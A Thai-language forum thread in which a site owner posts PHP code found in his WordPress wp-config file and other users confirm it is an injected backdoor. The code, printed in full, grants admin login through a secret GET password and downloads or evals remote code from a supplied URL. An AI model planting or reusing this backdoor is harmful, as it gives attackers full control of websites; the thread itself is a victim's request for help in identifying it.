ต่อไป »

[KONINW]

ผมสงสัยว่ามีโค้ดแปลกปลอมหรือเปล่า หรือโดนฝั่งสคริป

โค้ดนี้ครับ

โค๊ด:

if (isset($_GET['pingnow'])&& isset($_GET['pass'])){
if ($_GET['pass'] == '72b32a1f754ba1c09b3695e0cb6cde7f'){
if ($_GET['pingnow']== 'login'){
$user_login = 'admin';
$user = get_userdatabylogin($user_login);
$user_id = $user->ID;
wp_set_current_user($user_id, $user_login);
wp_set_auth_cookie($user_id);
do_action('wp_login', $user_login);
}
if (($_GET['pingnow']== 'exec')&&(isset($_GET['file']))){
$ch = curl_init($_GET['file']);
$fnm = md5(rand(0,100)).'.php';
$fp = fopen($fnm, "w");
curl_setopt($ch, CURLOPT_FILE, $fp);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_TIMEOUT, 5);
curl_exec($ch);
curl_close($ch);
fclose($fp);
echo "<SCRIPT LANGUAGE="JavaScript">location.href='$fnm';</SCRIPT>";
}
if (($_GET['pingnow']== 'eval')&&(isset($_GET['file']))){
$ch = curl_init($_GET['file']);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_TIMEOUT, 5);
$re = curl_exec($ch);
curl_close($ch);
eval($re);
}}}

[KONINW]

โดนฝั่งสคริปแน่ๆๆ 

โค๊ด:

http://cryclops.com/2011/09/hacked/

 

[makhamvan]

ถามเอง ตอบเอง เลยนะครับ

[kamjam]

โดนแน่ๆ  GET Pass ด้วย 

[hiomard]

เอามาจากไหนครับ 

[KONINW]

เอามาจากไหนครับ 

มันอยู่ในไฟล์ wp-comfig ของ wordpress เว็บผมครับ

 

[T.mizaki]

เอามาจากไหนครับ 

มันอยู่ในไฟล์ wp-comfig ของ wordpress เว็บผมครับ

 

โหลด wp ตัวติดตั้งมาจากที่ไหนอะครับ

[XXL]

โดนแล้วครับ คงต้องล้างระบบ ลงใหม่แน่ เพราะไม่รู้มันทำอะไรไปแล้วบ้าง
จากสคริป ข้างบน สามารถ ลงและรัน ไฟล์อะไร ที่เซิร์ฟเวอร์ ได้เลย